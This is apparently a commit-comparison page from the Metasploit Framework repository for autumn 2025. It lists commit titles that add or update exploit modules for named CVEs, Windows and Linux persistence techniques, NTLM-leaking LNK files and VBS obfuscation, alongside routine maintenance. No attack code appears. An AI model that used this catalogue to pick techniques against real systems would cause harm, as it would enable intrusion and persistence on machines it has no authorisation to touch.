Compare commits

...

494 Commits

Author SHA1 Message Date
jenkins-metasploit 1d19c37c62 automatic module_metadata_base.json update 2025-11-05 15:39:36 +00:00
Diego Ledda 110cb837aa Merge pull request #20672 from h00die-gr3y/centreon_auth_rce
Centreon authenticated command injection leading to RCE via broker engine "reload" parameter [CVE-2025-5946]
2025-11-05 16:29:29 +01:00
h00die-gr3y 34c424f473 update based on dledda-r7 comments 2025-11-05 09:20:13 +00:00
Brendan b70d9c074a Merge pull request #20673 from adfoster-r7/pin-date-dependency
Pin date dependency
2025-11-04 12:29:56 -06:00
adfoster-r7 57a3590a94 Pin date dependency 2025-11-03 17:30:47 +00:00
h00die-gr3y 61dfc293d9 update based on dledda-r7 comments 2025-11-03 14:37:23 +00:00
h00die-gr3y 408eceb2d9 small update documentation 2025-11-03 10:27:44 +00:00
h00die-gr3y 85b4233345 updated module based on review comments and added documentation 2025-11-03 10:21:31 +00:00
h00die-gr3y 83e7fc2667 update attackerkb reference 2025-11-02 18:26:34 +00:00
h00die-gr3y e01456bcf4 init commit module 2025-11-02 17:45:22 +00:00
jenkins-metasploit 1c4e3d59ee automatic module_metadata_base.json update 2025-10-31 11:38:37 +00:00
Diego Ledda 13dc61e2e8 Merge pull request #20523 from h00die/modern_persistence_upstart
update upstart to persistence mixin
2025-10-31 12:28:59 +01:00
jenkins-metasploit ad0f984f4c automatic module_metadata_base.json update 2025-10-31 09:26:00 +00:00
msutovsky-r7 af5baeb3c6 Land #20660, adds windows task scheduler persistence module
Windows task scheduler persistence
2025-10-31 10:16:19 +01:00
jenkins-metasploit 54a1810273 automatic module_metadata_base.json update 2025-10-31 09:09:45 +00:00
msutovsky-r7 c804e5fb55 Land #20643, expands diamorphine privilege escalation module to other rootkits
Add Rootkit Privilege Escalation Signal Hunter
2025-10-31 10:00:21 +01:00
bcoles 676a2ed4b1 Add Rootkit Privilege Escalation Signal Hunter 2025-10-31 17:22:19 +11:00
jenkins-metasploit 7098e47626 Bump version of framework to 6.4.97 2025-10-30 16:37:30 +00:00
jenkins-metasploit fc7040bb1b automatic module_metadata_base.json update 2025-10-30 07:38:51 +00:00
msutovsky-r7 09f1d1ae57 Land #20650, adds module for NCR Command Center Agent unauthenticated RCE (CVE-2021-3122)
Add NCR Command Center Agent Unauthenticated RCE (CVE-2021-3122)
2025-10-30 08:26:42 +01:00
Martin Sutovsky 666e63f993 Rubocopes module 2025-10-30 07:43:32 +01:00
jenkins-metasploit 90408517f1 automatic module_metadata_base.json update 2025-10-29 12:50:37 +00:00
Spencer McIntyre ca2f3ab3a6 Merge pull request #20648 from bcoles/cydia_default_ssh
exploit/apple_ios/ssh/cydia_default_ssh: Add mobile:alpine creds
2025-10-29 08:42:15 -04:00
jenkins-metasploit a9c91baf6f automatic module_metadata_base.json update 2025-10-29 12:32:11 +00:00
msutovsky-r7 56480df99f Land #20662, adds windows startup folder persistence module
windows persistence: startup folder
2025-10-29 13:23:35 +01:00
h00die 34b630736a Merge remote-tracking branch 'origin/windows_taskscheduler_persistence' into windows_taskscheduler_persistence 2025-10-29 05:22:55 -04:00
h00die f03b32551a Update modules/exploits/windows/persistence/task_scheduler.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-10-29 05:22:28 -04:00
h00die b48215d9c1 Merge remote-tracking branch 'origin/windows_taskscheduler_persistence' into windows_taskscheduler_persistence 2025-10-29 05:21:45 -04:00
h00die 35f632bc85 windows persistence: task scheduler review 2025-10-29 05:20:57 -04:00
h00die 85fa7e0391 windows persistence: startup folder review 2025-10-29 05:18:20 -04:00
Muhammad Daffa b98e66b744 Minor changes, code review from @msutovsky-r7 2025-10-29 13:18:17 +07:00
h00die fd6d84df0f Update modules/exploits/windows/persistence/task_scheduler.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-10-27 19:51:32 -04:00
h00die c0b3f40b3e upstart review 2025-10-27 19:45:38 -04:00
h00die fd04f465eb windows persistence: startup folder 2025-10-27 15:35:52 -04:00
jenkins-metasploit 8dd2724977 automatic module_metadata_base.json update 2025-10-27 14:06:20 +00:00
msutovsky-r7 d839a84a12 Land #20631, moves windows registry module into persistence category
update windows registry to persistence mixin
2025-10-27 14:57:48 +01:00
Muhammad Daffa 1b53604852 Code review changes from @msutovsky-r7 2025-10-27 17:19:11 +07:00
jenkins-metasploit 086fad626b automatic module_metadata_base.json update 2025-10-27 07:28:31 +00:00
bcoles c6d58d1b57 Land #20661, Add aarch64 payload support to gitea_git_fetch_rce module 2025-10-27 18:18:26 +11:00
Michael MacFadden b481b9ef7b gitea_git_fetch_rce aarch64 payload support
Add support for the Linux Dropper to use payloads targeted to ARCH_AARCH64
2025-10-26 19:19:11 -05:00
h00die 4fdce5e510 windows persistence: task scheduler 2025-10-26 16:26:32 -04:00
h00die c210a897ac windows persistence: task scheduler 2025-10-26 16:17:16 -04:00
jenkins-metasploit 8528cb255a automatic module_metadata_base.json update 2025-10-24 16:27:34 +00:00
Brendan d1c9410a95 Merge pull request #20594 from HamzaSahin61/feat/redoc-exposed-scanner
auxiliary(scanner/http/redoc_exposed): detect exposed ReDoc API docs UI
2025-10-24 11:19:13 -05:00
jenkins-metasploit 5d73d8a2c7 Bump version of framework to 6.4.96 2025-10-24 14:56:49 +00:00
adfoster-r7 52308d0df6 Merge pull request #20655 from adfoster-r7/fix-meterpreter-migration-crash
Fix Meterpreter migration crash
2025-10-24 14:39:21 +01:00
jenkins-metasploit c4dd66723f automatic module_metadata_base.json update 2025-10-24 13:38:10 +00:00
msutovsky-r7 d8357ce329 Land #20564, adds persistence suggester module
persistence suggester
2025-10-24 15:29:54 +02:00
adfoster-r7 a984e15cb6 Fix Meterpreter migration crash 2025-10-24 14:07:59 +01:00
adfoster-r7 4dd245a60e Merge pull request #20639 from adfoster-r7/fix-oracle-login-crash
Fix oracle login crash
2025-10-24 14:06:59 +01:00
adfoster-r7 a5dd6c37ff Merge pull request #20654 from molecula2788/msf_session_bootstrap_fix
lib/msf/base/sessions/meterpreter.rb: Use &. across the entire chain when handling datastore['AutoLoadExtensions']
2025-10-24 13:43:04 +01:00
Adrian Șendroiu c2ce203281 lib/msf/base/sessions/meterpreter.rb: Use &. across the entire chain when handling datastore['AutoLoadExtensions'] 2025-10-24 14:30:56 +03:00
dwelch-r7 1ee88e1a7a Merge pull request #20651 from adfoster-r7/pin-rexml-to-avoid-winrm-warnings
Pin rexml to avoid winrm warnings
2025-10-24 11:14:53 +01:00
dwelch-r7 7303e78f4a Merge pull request #20652 from adfoster-r7/fix-ssh-login-crash-for-pro
Fix ssh login crash for pro
2025-10-24 11:14:07 +01:00
adfoster-r7 25772a5a64 Fix ssh login crash for pro 2025-10-24 10:31:27 +01:00
adfoster-r7 8d35eb975d Pin rexml to avoid winrm warnings 2025-10-24 10:29:00 +01:00
Muhammad Daffa b059a61d1b Add ncr_cmcagent_rce module 2025-10-24 16:17:14 +07:00
Muhammad Daffa af2b2cc40f Add documentation for NCR Command Center Agent RCE 2025-10-24 16:15:11 +07:00
bcoles 33462bf233 exploit/apple_ios/ssh/cydia_default_ssh: Add mobile:alpine creds 2025-10-24 18:02:35 +11:00
bcoles 52b7f1ff25 Deprecate exploit/linux/local/diamorphine_rootkit_signal_priv_esc 2025-10-24 17:05:10 +11:00
h00die 0f26c9316a registry persistence peer review 2025-10-23 17:44:22 -04:00
jenkins-metasploit 909d872cf6 automatic module_metadata_base.json update 2025-10-23 16:52:30 +00:00
jheysel-r7 4bc06606ff Merge pull request #20640 from msutovsky-r7/fix/ldap/cert_finder/register_values
Adds safe navigator in ldap_esc_vulnerable_cert_finder
2025-10-23 09:44:17 -07:00
adfoster-r7 52f2094ccb Merge pull request #20641 from rapid7/smcintyre-r7-patch-1
Update contact emails in CODE_OF_CONDUCT.md
2025-10-23 15:01:47 +01:00
Spencer McIntyre c41c0c882b Update contact emails in CODE_OF_CONDUCT.md
Updated contact emails for reporting unacceptable behavior.
2025-10-23 09:15:15 -04:00
Martin Sutovsky 3c11db422a Adds safe navigation operator 2025-10-23 14:41:18 +02:00
Martin Sutovsky 51e3a2d0c5 Changes return value from nil to [] in enum_registry_values 2025-10-23 13:53:57 +02:00
adfoster-r7 b2d1095d22 Fix oracle login crash 2025-10-23 10:30:57 +01:00
HamzaSahin61 e17b2a0598 Remove 'How It Works' section from redoc_exposed.md
Removed the 'How It Works' section detailing the probing process for REDOC.
2025-10-23 01:45:38 +03:00
HamzaSahin61 9640152f25 Update redoc_exposed.md 2025-10-23 01:31:09 +03:00
jenkins-metasploit c20dd4a278 automatic module_metadata_base.json update 2025-10-22 12:35:53 +00:00
adfoster-r7 f24552cdfd Merge pull request #20632 from h00die/linqpad_cleanup
Linqpad cleanup
2025-10-22 13:23:32 +01:00
adfoster-r7 1e1355bc7b Merge pull request #20636 from sjanusz-r7/anemone-infinite-recursion-fix
Infinite recursion on error page fix for Anemone
2025-10-22 11:35:19 +01:00
sjanusz-r7 fa6abd6011 Infinite recursion on error page fix for Anemone 2025-10-22 11:15:58 +01:00
jenkins-metasploit 546d17e032 automatic module_metadata_base.json update 2025-10-22 07:36:35 +00:00
msutovsky-r7 e5ee4d5384 Land #20630, adds authenticated RCE module for Vvveb CMS (CVE-2025-8518)
Add Vvveb CMS Authenticated RCE (CVE-2025-8518)
2025-10-22 09:27:59 +02:00
HamzaSahin61 49c1481687 Update redoc_exposed.md 2025-10-22 02:04:27 +03:00
jenkins-metasploit 7a9f24dc29 automatic module_metadata_base.json update 2025-10-21 16:37:11 +00:00
adfoster-r7 306ee8454b Merge pull request #20633 from Chocapikk/typo-freepbx
easy-fix: Fix typo in modules/exploits/unix/http/freepbx_unauth_sqli_to_rce
2025-10-21 17:28:49 +01:00
Maksim Rogov ff73363159 Update modules/exploits/multi/http/vvveb_auth_rce_cve_2025_8518.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-10-21 19:10:16 +03:00
vognik 45a87eaaca small fixes 2025-10-20 09:41:48 -07:00
vognik 74c7f98ad9 code review changes from @msutovsky-r7 2025-10-20 09:00:24 -07:00
Valentin Lobstein 97b58f9372 easy-fix: Fix typo in modules/exploits/unix/http/freepbx_unauth_sqli_to_rce 2025-10-20 14:29:19 +02:00
h00die 8490ce844d linqpad persistence cleanup 2025-10-19 10:08:33 -04:00
h00die ef9300870a linqpad persistence cleanup 2025-10-19 10:05:48 -04:00
h00die 287cba7436 linqpad persistence cleanup 2025-10-19 10:05:36 -04:00
h00die 2575a9ad03 windows registry persistence doc update 2025-10-19 09:45:06 -04:00
h00die bc9bd4b62c windows registry persistence mixin conversion 2025-10-19 09:36:59 -04:00
vognik 9ad83f6454 Add Vvveb CMS Authenticated RCE (CVE-2025-8518) 2025-10-18 17:12:05 -07:00
adfoster-r7 52f07b6820 Merge pull request #20627 from h00die/fix_post_docs_options
Update post docs to use modern h3 for options instead of original spec (bold)
2025-10-17 21:09:59 +01:00
adfoster-r7 664c9559d1 Merge pull request #20629 from h00die/no_4_space_options
Clean up 2 aux docs
2025-10-17 21:06:31 +01:00
h00die c86aefa328 remove 4 space indents in options 2025-10-16 19:34:39 -04:00
h00die 976c208414 remove 4 space indents in options 2025-10-16 19:31:50 -04:00
jheysel-r7 2d5f10d965 Merge pull request #20626 from h00die/fix_payload_docs_options
Update payload docs to use modern h3 for options instead of original spec (bold)
2025-10-16 08:42:07 -07:00
jenkins-metasploit a059f239c9 automatic module_metadata_base.json update 2025-10-16 14:48:42 +00:00
Diego Ledda 644bcfabbb Merge pull request #20522 from h00die/modern_persistence_sysvinit
update systemvinit to persistence mixin
2025-10-16 16:35:16 +02:00
jenkins-metasploit 5c3b9480bb Bump version of framework to 6.4.95 2025-10-16 11:06:34 +00:00
jenkins-metasploit f271212ab0 Bump version of framework to 6.4.94 2025-10-16 09:42:01 +00:00
h00die 40f3d4b72e fix doc options bold to h3 2025-10-15 16:38:17 -04:00
h00die 6cc4465f6f fix doc options bold to h3 2025-10-15 16:28:24 -04:00
jenkins-metasploit bb9f3b46de automatic module_metadata_base.json update 2025-10-15 17:32:08 +00:00
jheysel-r7 677af06c9f Merge pull request #20621 from h00die/modern_periodic_script
update periodic_script to persistence mixin
2025-10-15 10:23:56 -07:00
adfoster-r7 aa34a0e016 Merge pull request #20622 from h00die/fix_doc_options
Update aux docs to use modern h3 for options instead of original spec (bold)
2025-10-15 17:47:52 +01:00
adfoster-r7 1549f9cae5 Merge pull request #20623 from bcoles/spec-module-validation
spec: ModuleValidation: Validate module DefaultTarget value
2025-10-15 13:22:56 +01:00
bcoles daf280ad11 spec: ModuleValidation: Validate module DefaultTarget value 2025-10-15 19:58:25 +11:00
h00die c629dc408c replace some bolds 2025-10-14 20:44:00 -04:00
h00die 1f479ddedc update doc options to h3 from bold 2025-10-14 20:23:50 -04:00
h00die 55583bd2c8 review for sysv persistence 2025-10-14 19:30:06 -04:00
h00die 68c74e1bcf remove unnecessary writabledir variable and check 2025-10-13 19:54:05 -04:00
h00die f3219668e0 remove unnecessary sudo 2025-10-13 17:48:02 -04:00
h00die 1e9dd04505 update periodic_script to new persistence mechanism 2025-10-13 17:48:00 -04:00
h00die 7a8189f976 additional check 2025-10-13 14:07:18 -04:00
h00die c0b09693e3 systemv updated with mixin updates 2025-10-13 13:42:41 -04:00
h00die 1a13d39a4d use ATT&CK ref in sysvinit persistence module 2025-10-13 13:42:41 -04:00
h00die 058e858e82 update systemvinit to persistence mixin 2025-10-13 13:42:41 -04:00
jenkins-metasploit 6f461098cc automatic module_metadata_base.json update 2025-10-13 17:01:56 +00:00
adfoster-r7 fcb469bf66 Merge pull request #20611 from bcoles/periodic_script_persistence
exploit/multi/local/periodic_script_persistence: Unset DefaultTarget
2025-10-13 17:50:57 +01:00
adfoster-r7 475b294ff9 Merge pull request #20620 from adfoster-r7/pin-rack-dependencies
Pin rack dependencies
2025-10-13 17:49:42 +01:00
adfoster-r7 8672c52d95 Merge pull request #20619 from adfoster-r7/future-proof-peinject-method-override
Future proof peinject method override
2025-10-13 16:24:57 +01:00
adfoster-r7 3532254691 Pin rack dependencies 2025-10-13 16:03:28 +01:00
adfoster-r7 edd536b3bf Future proof peinject method override 2025-10-13 15:22:05 +01:00
bcoles 93b3ec34ac exploit/multi/local/periodic_script_persistence: Unset DefaultTarget 2025-10-11 21:47:11 +11:00
adfoster-r7 55bb27711d Merge pull request #20608 from molecula2788/peinject_valid_fix
Add missing datastore argument in the `valid?` function in pe_inject.rb
2025-10-10 19:18:36 +01:00
Adrian Șendroiu 7d5ad67ad6 pe_inject.rb: Add missing datastore argument 2025-10-10 13:24:50 +03:00
HamzaSahin61 bbd2767fe1 Update redoc_exposed.md 2025-10-10 00:10:38 +03:00
HamzaSahin61 33244f66f0 style: rubocop auto-corrections + add Notes metadata 2025-10-09 23:41:11 +03:00
jenkins-metasploit 67ff15edeb automatic module_metadata_base.json update 2025-10-09 18:59:02 +00:00
Brendan 91c0adb17f Merge pull request #20585 from vognik/CVE_2025_60787
Add MotionEye Authenticated RCE (CVE-2025-60787)
2025-10-09 13:50:25 -05:00
jenkins-metasploit 2c082a4fef automatic module_metadata_base.json update 2025-10-09 18:33:04 +00:00
Spencer McIntyre 27d0e638ed Merge pull request #20546 from dwelch-r7/fix-ssh-login-pubkey
Fix ssh login pubkey module
2025-10-09 14:24:09 -04:00
Vognik 267a26b763 code review changes from smcintyre-r7@ 2025-10-09 21:51:31 +04:00
Dean Welch 8c5c395ce7 Fix ssh login pubkey module 2025-10-09 12:36:00 +01:00
Metasploit 9e8b1d5a9c Bump version of framework to 6.4.93 2025-10-09 03:33:47 -05:00
jenkins-metasploit 7c997c88f0 automatic module_metadata_base.json update 2025-10-08 21:09:17 +00:00
jheysel-r7 a8ec46f2b2 Merge pull request #20579 from nakkouchtarek/listmonk_env_disclosure
Add Listmonk Template Function Environment Variable Disclosure Auxiliary Module (CVE-2025-49136)
2025-10-08 14:00:37 -07:00
Tarek Nakkouch 7c840a1bac Add Listmonk environment disclosure auxiliary module 2025-10-08 21:02:24 +01:00
HamzaSahin61 db6dbf4f8e Update redoc_exposed.md 2025-10-08 21:19:35 +03:00
jenkins-metasploit 5f80ca6a2b automatic module_metadata_base.json update 2025-10-08 18:08:33 +00:00
Brendan 10d1f53692 Merge pull request #19975 from dledda-r7/feat/split-stdapi
Split Stdapi
2025-10-08 13:00:04 -05:00
HamzaSahin61 4577a3d735 Update redoc_exposed.rb 2025-10-08 20:56:53 +03:00
jenkins-metasploit 3ed3b3964c automatic module_metadata_base.json update 2025-10-08 15:59:46 +00:00
jheysel-r7 4f4febfcac Merge pull request #20602 from zeroSteiner/fix/fusionpbx-cve
Remove a CVE that was mistakenly added
2025-10-08 08:51:17 -07:00
Brendan 05894ccb78 Apply suggestion from @bwatters-r7 2025-10-08 10:36:32 -05:00
Brendan 5d56f70ef2 Apply suggestion from @bwatters-r7 2025-10-08 10:35:50 -05:00
Brendan e9936265dd Update LICENSE_GEMS 2025-10-08 10:33:59 -05:00
Brendan 6a0a19b05d Apply suggestion from @bwatters-r7
Bump Payloads version again
2025-10-08 10:21:15 -05:00
Spencer McIntyre 7b2643ce5d Remove a CVE that was mistakenly added 2025-10-08 10:45:59 -04:00
dwelch-r7 02a894a189 Merge pull request #20601 from adfoster-r7/remove-faraday-pin
Remove faraday pin
2025-10-08 14:17:38 +01:00
adfoster-r7 9fe13e204a Remove faraday pin 2025-10-08 13:39:23 +01:00
jenkins-metasploit 077ed6b567 automatic module_metadata_base.json update 2025-10-08 11:13:33 +00:00
dwelch-r7 c03dd45875 Merge pull request #20600 from adfoster-r7/unpin-octokit
Unpin octokit
2025-10-08 12:04:58 +01:00
HamzaSahin61 33825d06ec Update redoc_exposed.rb 2025-10-08 03:45:12 +03:00
HamzaSahin61 941f3f3b72 Update redoc_exposed.md 2025-10-08 03:42:06 +03:00
HamzaSahin61 43526ee0e0 Update redoc_exposed.md 2025-10-08 03:37:43 +03:00
HamzaSahin61 67490e4244 Create redoc_exposed.md 2025-10-08 01:46:56 +03:00
jheysel-r7 eeaf760948 Merge pull request #20595 from zeroSteiner/fix/add-missing-cves
Add Missing CVE Data To Modules In Bulk
2025-10-07 15:28:37 -07:00
HamzaSahin61 fc35a8a32f Update redoc_exposed.rb 2025-10-08 01:09:29 +03:00
Spencer McIntyre 9dc5696cc4 Update dash characters in module references 2025-10-07 14:03:32 -04:00
Spencer McIntyre fd21209e4d Add missing CVEs from VulnCheck 2025-10-07 13:59:13 -04:00
Spencer McIntyre 17c5b3707a Add missing module notes 2025-10-07 13:59:13 -04:00
Spencer McIntyre d727302de6 Pass all the files to msftidy to speed things up 2025-10-07 13:59:13 -04:00
adfoster-r7 e0ed3f7d6f Unpin octokit 2025-10-07 18:08:30 +01:00
jheysel-r7 e202546d5d Merge pull request #20597 from adfoster-r7/update-developer-dependencies
Update developer dependencies
2025-10-07 07:59:04 -07:00
jheysel-r7 08510166a4 Merge pull request #20596 from adfoster-r7/update-rails-dependencies
Update rails dependencies
2025-10-07 07:52:56 -07:00
dledda-r7 7d8aa260e4 fix: better extension suggestion with an unknown command 2025-10-07 09:53:02 -04:00
adfoster-r7 8991bec4c3 Update developer dependencies 2025-10-07 13:36:06 +01:00
adfoster-r7 a029f34a6f Update rails dependencies 2025-10-07 13:33:20 +01:00
Vognik 5cb1968c42 small fixes 2025-10-07 08:49:24 +04:00
Vognik 1be31c05da add some random 2025-10-07 08:38:20 +04:00
Vognik c05a9d3f7f code review changes from @bwatters-r7 2025-10-07 03:07:26 +04:00
jheysel-r7 f61a321dcd Merge pull request #20591 from survivant/feature/fix-typos-hacktoberfest
Fix typos in documentation / hacktoberfest
2025-10-06 13:43:32 -07:00
jenkins-metasploit e1bcc0aab6 automatic module_metadata_base.json update 2025-10-06 20:31:43 +00:00
jheysel-r7 dbf84abec3 Merge pull request #20586 from bcoles/windows_script_host_wsf
Add Malicious Windows Script Host Script File (.wsf) module
2025-10-06 13:21:56 -07:00
HamzaSahin61 c2f554bc36 auxiliary(scanner/http/redoc_exposed): detect exposed ReDoc API docs UI 2025-10-06 22:37:28 +03:00
dledda-r7 763f631852 fix: better loading check for split-stdapi 2025-10-06 08:40:09 -04:00
Vognik 25624e9ae0 code review changes 2025-10-06 15:46:59 +04:00
dledda-r7 35fe047a6e chore: stdapi extensions fix comments, and format 2025-10-06 07:29:32 -04:00
dledda-r7 381ed892fa chore: stdapi command dispatcher fix comments, and format 2025-10-06 06:48:12 -04:00
Diego Ledda a1ab9b8ca9 Update lib/rex/post/meterpreter/extensions/stdapi_audio/stdapi_audio.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2025-10-06 10:31:54 +02:00
Diego Ledda 69ebefec13 Update lib/rex/post/meterpreter/client_core.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2025-10-06 10:30:45 +02:00
Diego Ledda 650ee9f6f1 Update lib/rex/payloads/meterpreter/config.rb 2025-10-06 10:10:05 +02:00
Sebastien Dionne 77f760c1bf Fix typos in documentation 2025-10-05 12:01:16 -04:00
bcoles 9a8d1473d8 Add Malicious Windows Script Host Script File (.wsf) module 2025-10-05 20:16:00 +11:00
Vognik 6d295b993a Add MotionEye Unauthenticated RCE (CVE-2025-60787) 2025-10-05 05:32:32 +04:00
jenkins-metasploit 05c854b1c5 automatic module_metadata_base.json update 2025-10-03 20:45:10 +00:00
jheysel-r7 5252e92954 Merge pull request #20568 from bcoles/vbsobfuscate
Msf::Exploit::VBSObfuscate: Add VBS obfuscation library
2025-10-03 13:36:43 -07:00
jenkins-metasploit 7b9ce27117 automatic module_metadata_base.json update 2025-10-03 17:13:21 +00:00
jheysel-r7 04188cb9cb Merge pull request #20527 from h00die/modern_persistence_plist
update plist persistence to mixin
2025-10-03 10:05:17 -07:00
jenkins-metasploit 4526ae920e automatic module_metadata_base.json update 2025-10-03 14:53:51 +00:00
msutovsky-r7 1491edeeb0 Land #20563, adds automatic identifying and checking of CAs when running registry check
Update reg checks when DC and CA are separate
2025-10-03 16:45:09 +02:00
dledda-r7 5f2adab0e7 fix: updated stdapi loading logic 2025-10-03 09:53:50 -04:00
Jack Heysel 74d229e11f Multiple CA testing 2025-10-02 18:14:00 -07:00
Spencer McIntyre 0aed5fcfbc Merge pull request #20582 from xHector1337/bump-rex-random_identifier
Bump rex-random_identifier to version 0.1.21
2025-10-02 17:35:56 -04:00
Muzaffer Umut ŞAHİN 82f1335e82 Bump rex-random_identifier to version 0.1.21 2025-10-02 18:47:47 +03:00
Metasploit 8a021abf56 Bump version of framework to 6.4.92 2025-10-02 03:32:41 -05:00
msutovsky-r7 b5c9547cc0 Land #20456, adds documentation for wordpress_cp_calendar_sqli auxiliary module
Add documentation for auxiliary/scanner/http/wordpress_cp_calendar_sqli
2025-10-02 08:02:12 +02:00
Martin Sutovsky 3cc91f544e Fixes msftidy_docs issues 2025-10-02 07:39:48 +02:00
Martin Sutovsky 103ae28696 Addressing comments 2025-10-02 07:36:10 +02:00
Jack Heysel f19f910f7e Add msPKI-Certificate-Name-Flag to cert details 2025-10-01 17:35:36 -07:00
Jack Heysel 1da518ec82 Responded to comments 2025-10-01 17:35:36 -07:00
Jack Heysel c73ffae95b Updated CA datastore option definition 2025-10-01 17:35:36 -07:00
Jack Heysel 0458c3db70 minor edits 2025-10-01 17:35:36 -07:00
Jack Heysel 66d59a7ddc Update reg checks when DC and CA are separate 2025-10-01 17:35:36 -07:00
jenkins-metasploit a3498db126 automatic module_metadata_base.json update 2025-10-01 06:48:16 +00:00
msutovsky-r7 6e06963495 Land #20566, adds support to esc_update_ldap module when shadow credentials are not required
Update esc_update_ldap module so shadow creds not required
2025-10-01 08:39:26 +02:00
msutovsky-r7 81127918fe Land #20518, adds NTLM leak/LNK padding fileformat modules
Adds fileformat NTLM leak/LNK padding modules
2025-09-29 15:34:40 +02:00
Martin Sutovsky c044db677d Clears up docs 2025-09-29 14:29:11 +02:00
Martin Sutovsky 310b8b7f8a Includes share datastore option in UNC path 2025-09-29 11:37:42 +02:00
Martin Sutovsky 38efab0bab Rubocopes, fixes SMB server, code cleanup 2025-09-29 11:33:33 +02:00
Martin Sutovsky 5faf18795c Rubocopes, fixes SMB server 2025-09-29 11:20:55 +02:00
Martin Sutovsky eaada61d80 Fixes notes 2025-09-29 11:10:00 +02:00
Martin Sutovsky 042cdb7a60 Code cleanup, adds Faker, fixing SMB server 2025-09-29 10:55:10 +02:00
Martin Sutovsky 82e2f03c23 Fixes ZDI reference, code cleanup 2025-09-29 10:13:37 +02:00
Martin Sutovsky d21f7917a9 Fixes regex 2025-09-29 10:01:24 +02:00
jenkins-metasploit a849571502 automatic module_metadata_base.json update 2025-09-29 07:44:10 +00:00
Martin Sutovsky 7b4bb55e12 Rubocopes 2025-09-29 09:41:10 +02:00
msutovsky-r7 a23473a103 Land #20565, moves image exec module to persistence category and mixin
Modern persistence image exec
2025-09-29 09:32:25 +02:00
h00die 81d8d46166 peer review 2025-09-26 15:44:31 -04:00
jenkins-metasploit 20c8708c96 automatic module_metadata_base.json update 2025-09-26 14:06:43 +00:00
msutovsky-r7 79ff667d5e Land #20538, adds systemd override persistence module
persistence: systemd service override
2025-09-26 15:57:31 +02:00
dledda-r7 889941487b fix: fix logic for split stdapi loading 2025-09-26 09:43:20 -04:00
jenkins-metasploit 95bc7a4599 automatic module_metadata_base.json update 2025-09-26 13:02:18 +00:00
Martin Sutovsky 00f902b04b Adds formatting to cleanup commands 2025-09-26 15:00:09 +02:00
Spencer McIntyre 3d1d49b71a Merge pull request #20517 from cgranleese-r7/adds-postgres-ssl-support
Adds SSL support to the postgres_login module
2025-09-26 08:53:47 -04:00
dledda-r7 dd802fa8a6 fix: fix mettle stdapi split regression 2025-09-26 06:54:24 -04:00
dledda-r7 48e8d40701 fix: update meterpreter stageless cached size 2025-09-26 06:11:40 -04:00
dledda-r7 0a2707b8af fix: update meterpreter stageless cached size 2025-09-26 03:54:58 -04:00
happybear-21 8cfc2ae723 fixed: issues, updated requested changes (files: specialfolder_leak.rb, environment_variable_datablock_leak.rb, icon_environment_datablock_leak.rb) 2025-09-26 11:05:39 +05:30
h00die 09475fc2b9 peer review 2025-09-25 16:38:50 -04:00
Jack Heysel 7b3c82f2e6 Responded to comments 2025-09-25 13:35:41 -07:00
bcoles bbc9928a75 exploit/windows/fileformat/windows_script_host_vbscript: Use VBSObfuscate 2025-09-26 03:06:37 +10:00
bcoles 5b0565a4a1 Msf::Exploit::VBSObfuscate: Add VBS obfuscation library 2025-09-26 03:06:20 +10:00
Martin Sutovsky a91f5f53f2 Substitutes cmd_exec with mkdir to create_process 2025-09-25 18:20:54 +02:00
adfoster-r7 070bf7f287 Merge pull request #20555 from bwatters-r7/spec/add-x64-meterp-acc-tests
add x64 acceptance tests, and use single, release payload
2025-09-25 15:40:51 +01:00
dledda-r7 0b1ec457b1 feat: bump metasploit-payloads 2025-09-25 10:27:05 -04:00
jenkins-metasploit 7f88110032 automatic module_metadata_base.json update 2025-09-25 10:58:08 +00:00
msutovsky-r7 86381a6394 Land #20412, swaps to psh_exec in powershell/exec_powershell
Remove errant write_log call and swap to the all-in-one psh_exec rath…
2025-09-25 12:49:33 +02:00
adfoster-r7 391e4e22f6 Merge pull request #20567 from bcoles/rex-exploitation
bump rex-exploitation gem from 0.1.41 to 0.1.44
2025-09-25 10:08:40 +01:00
cgranleese-r7 40f6e2ca60 Updates test to cover SSL support 2025-09-25 09:48:44 +01:00
Metasploit c4b7d9b42f Bump version of framework to 6.4.91 2025-09-25 03:32:30 -05:00
happybear-21 ae3b548be6 fixed: issues, updated requested changes (file: datablock_padding_lnk.rb) 2025-09-24 21:56:14 +05:30
adfoster-r7 40c32a2599 Merge pull request #20561 from cgranleese-r7/fixes-report-note-warning-when-no-data-key
Fixes deprecation message logic when no `data` object present
2025-09-24 14:29:45 +01:00
adfoster-r7 13b6c6eb98 Add named variable
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2025-09-24 13:57:39 +01:00
Jack Heysel e9ab1d0839 Update esc_update_ldap module so shadow creds not required 2025-09-23 14:37:55 -07:00
h00die 915cad72b5 modern persistence for windows image_exec_options 2025-09-23 17:25:27 -04:00
h00die 2b16a23436 Update modules/exploits/osx/persistence/launch_plist.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2025-09-23 16:59:26 -04:00
h00die e855938ff8 persistence suggester 2025-09-23 16:40:43 -04:00
h00die 01a07ac9a1 modernizing windows persistence 2025-09-23 16:39:56 -04:00
bcoles 6d693c8586 bump rex-exploitation gem from 0.1.41 to 0.1.44 2025-09-24 05:11:51 +10:00
jenkins-metasploit 74de3c7314 automatic module_metadata_base.json update 2025-09-23 15:44:11 +00:00
Brendan a1e3e1545b Merge pull request #20562 from uhei/fix/weblogic-regex
fix: WebLogic server detection regex
2025-09-23 10:35:19 -05:00
msutovsky-r7 1a84744f15 Land #20557, fixes ActiveRecord error in reporting failure for file-based/multi-value RHOSTS
Fix ActiveRecord error when reporting failures with file-based RHOSTS
2025-09-23 16:28:10 +02:00
Martin Sutovsky 5260da1867 Removes redundant variables 2025-09-23 16:22:40 +02:00
Martin Sutovsky 6e01e7a5f6 Minor code changes 2025-09-23 16:16:41 +02:00
jenkins-metasploit 468b1027f3 automatic module_metadata_base.json update 2025-09-23 11:51:53 +00:00
msutovsky-r7 13b3e20a6b Land #20559, adds FreePBX unauthenticated SQLi to RCE module (CVE-2025-57819)
Add FreePBX Unauthenticated SQLi to RCE (CVE-2025-57819)
2025-09-23 13:38:44 +02:00
Uli Heilmeier 5af0dd3357 fix: WebLogic server detection regex
